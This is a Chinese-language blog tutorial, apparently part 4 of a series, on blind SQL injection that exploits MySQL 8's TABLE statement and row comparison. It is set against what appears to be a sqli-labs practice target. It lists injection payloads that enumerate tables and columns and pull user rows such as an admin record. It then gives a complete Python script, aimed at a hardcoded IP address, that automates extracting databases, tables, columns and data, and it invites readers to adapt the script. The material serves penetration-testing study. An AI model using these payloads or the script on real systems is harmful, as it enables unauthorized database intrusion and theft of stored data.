主页 > 网络知识 > 浅谈利用mysql8新特性进行SQL注入(4)

浅谈利用mysql8新特性进行SQL注入(4)

(3)爆数据表
information_schema.tables表有21列

1' and ('def','security','users','',5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21)<=(table information_schema.tables limit 317,1)--+ #第一个表users 1' and ('def','security','emails','',5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21)<=(table information_schema.tables limit 318,1)--+ #第二个表emails 1' and ('def','security','uagents','',5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21)<=(table information_schema.tables limit 319,1)--+ #第三个表uagents 1' and ('def','security','referers','',5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21)<=(table information_schema.tables limit 320,1)--+ #第四个表referers

前两个字段都是确定的,可以写一个for循环判断,如果结果为真,代表从那行开始(这里是limit 317,1,即第318行),然后盲注第三个列。
(4)爆字段名
information_schema.columns表有22列
得到所有表名后开始判断字段名,找到columns表,具体方法和上面一样

1' and ('def','security','users','id','',6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22)<=(table information_schema.columns limit 3386,1)--+ #users表第一个字段为id 1' and ('def','security','users','password','',6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22)<=(table information_schema.columns limit 3387,1)--+ #users表,第二个字段为password 1' and ('def','security','users','username','',6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22)<=(table information_schema.columns limit 3388,1)--+ #users表,第三个字段为username

(3)爆数据

1' and (1,'D','')<=(table users limit 1)--+ #正常 1' and (1,'E','')<=(table users limit 1)--+ #错误 #table users limit 1也就是table users limit 0,1 #1' and (1,'D','')<=(table users limit 0,1)--+ #正常 #1' and (1,'E','')<=(table users limit 0,1)--+ #错误 ...... 1' and (1,'Dumb','Dumb')<=(table users limit 1)--+ #正常 1' and (1,'Dumb','Dumc')<=(table users limit 1)--+ #错误

得到第1个记录为1 Dumb Dumb

1' and (8,'admin','admin')<=(table users limit 7,1)--+ #正常 1' and (8,'admin','admio')<=(table users limit 7,1)--+ #错误

得到第8个记录为8 admin admin
一步一步注出数据

0x05 脚本编写

一个一个手注,似乎有点麻烦。自己于是尝试写个脚本:

''' @author qwzf @desc 本脚本是用于mysql 8新特性的sql注入 @date 2021/02/18 ''' import requests import string url = 'http://121.41.231.75:8002/Less-8/?id=' chars=string.ascii_letters+string.digits+"@{}_-?" def current_db(url): print("利用mysql8新特性或普通布尔盲注: 1.新特性(联合查询) 2.普通布尔盲注") print("请输入序号:",end='') num = int(input()) if num == 1: payload = "-1' union values row(1,database(),3)--+" #联合查询爆当前数据库(可修改) urls = url + payload r = requests.get(url=urls) print(r.text) else: name='' payload = "1' and ascii(substr((database()),{0},1))={1}--+" #布尔盲注爆当前数据库(可修改) for i in range(1,40): char='' for j in chars: payloads = payload.format(i,ord(j)) urls = url + payloads r = requests.get(url=urls) if "You are in" in r.text: name += j print(name) char = j break if char == '': break def str2hex(name): res = '' for i in name: res += hex(ord(i)) res = '0x' + res.replace('0x','') return res def dbs(url): #无列名盲注爆所有数据库(可修改) while True: print("请输入要爆第几个数据库,如:1,2等:",end='') x = int(input())-1 num = str(x) if x < 0: break payload = "1' and ('def',{},'',4,5,6)>(table information_schema.schemata limit "+num+",1)--+" name = '' for i in range(1,20): hexchar = '' for char in range(32, 126): hexchar = str2hex(name + chr(char)) payloads = payload.format(hexchar) #print(payloads) urls = url + payloads r = requests.get(url=urls) if 'You are in' in r.text: name += chr(char-1) print(name) break def tables_n(url,database): #无列名盲注爆数据表开始行数(可修改) payload = "1' and ('def','"+database+"','','',5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21)<(table information_schema.tables limit {},1)--+" for i in range(0,10000): payloads = payload.format(i) urls = url + payloads r = requests.get(url=urls) if 'You are in' in r.text: char = chr(ord(database[-1])+1) database = database[0:-1]+char payld = "1' and ('def','"+database+"','','',5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21)<(table information_schema.tables limit "+str(i)+",1)--+" urls = url + payld res = requests.get(url=urls) #print(i) if 'You are in' not in res.text: print('从第',i,'行开始爆数据表') #判断开始行数 n = i break return n def tables(url,database,n): #无列名盲注爆数据表(可修改) while True: print("请输入要爆第几个数据表,如:1,2等:",end='') x = int(input())-1 num = str(x + n) if x < 0: break payload = "1' and ('def','"+database+"',{},'',5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21)>(table information_schema.tables limit "+num+",1)--+" name = '' for i in range(1,20): hexchar = '' for char in range(32, 126): hexchar = str2hex(name + chr(char)) payloads = payload.format(hexchar) #print(payloads) urls = url + payloads r = requests.get(url=urls) if 'You are in' in r.text: name += chr(char-1) print(name) break def columns_n(url,database,table): #无列名盲注爆字段开始行数(可修改) payload = "1' and ('def','"+database+"','"+table+"','',5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22)<(table information_schema.columns limit {},1)--+" for i in range(3000,10000): payloads = payload.format(i) urls = url + payloads r = requests.get(url=urls) if 'You are in' in r.text: char = chr(ord(table[-1])+1) table = table[0:-1]+char payld = "1' and ('def','"+database+"','"+table+"','',5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22)<(table information_schema.columns limit "+str(i)+",1)--+" urls = url + payld res = requests.get(url=urls) #print(i) if 'You are in' not in res.text: print('从第',i,'行开始爆字段') #判断开始行数 n = i break return n def columns(url,database,table,n): #无列名盲注爆字段值(可修改) while True: print("请输入要爆第几个字段,如:1,2等:",end='') x = int(input())-1 num = str(x + n) if x < 0: break payload = "1' and ('def','"+database+"','"+table+"',{},'',6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22)>(table information_schema.columns limit "+num+",1)--+" name = '' for i in range(1,20): hexchar = '' for char in range(32, 126): hexchar = str2hex(name + chr(char)) payloads = payload.format(hexchar) #print(payloads) urls = url + payloads r = requests.get(url=urls) if 'You are in' in r.text: name += chr(char-1) print(name) break def datas(url,table): #无列名盲注爆数据(可修改) while True: print("请输入要爆第几个数据,如:1,2等:",end='') x = int(input()) y = x-1 num = str(y) if y < 0: break payload = "1' and ("+str(x)+",{},'')>(table "+table+" limit "+num+",1)--+" name = '' for i in range(1,20): hexchar = '' for char in range(32, 126): hexchar = str2hex(name + chr(char)) payloads = payload.format(hexchar) #print(payloads) urls = url + payloads r = requests.get(url=urls) if 'You are in' in r.text: name += chr(char-1) print(name) break if __name__ == "__main__": while True: print("请输入要操作的内容: 1.爆当前数据库 2.爆数据表开始行号 3.爆数据表 4.爆字段值开始行号 5.爆字段值 6.爆数据 7.爆所有数据库") types = int(input()) if types == 1: current_db(url) elif types == 2 or types == 3: print("请输入已经得到的数据库名:",end='') database = input() if types == 2: tables_n(url,database) elif types == 3: print("爆数据表开始行号:",end='') n = int(input()) tables(url,database,n) elif types == 4 or types == 5: print("请输入已经得到的数据库名:",end='') database = input() print("请输入已经得到的数据表名:",end='') table = input() if types == 4: columns_n(url,database,table) elif types == 5: print("爆字段值开始行号:",end='') n = int(input()) columns(url,database,table,n) elif types == 6: print("请输入要查询的数据表名:",end='') table = input() datas(url,table) else: dbs(url)

经测试基本没有问题。上边脚本是get型传参,且参数名为id的脚本。可根据实际情况进行修改。

0x06 CTF题目实战

暂时没有找到题目环境,找到后再总结
参考:

0x07 后记

上面记录了mysql8新特性的sql注入。可能会有个别不恰当之处,欢迎大师傅批评指正!

说点什么吧
  • 全部评论(0
    还没有评论,快来抢沙发吧!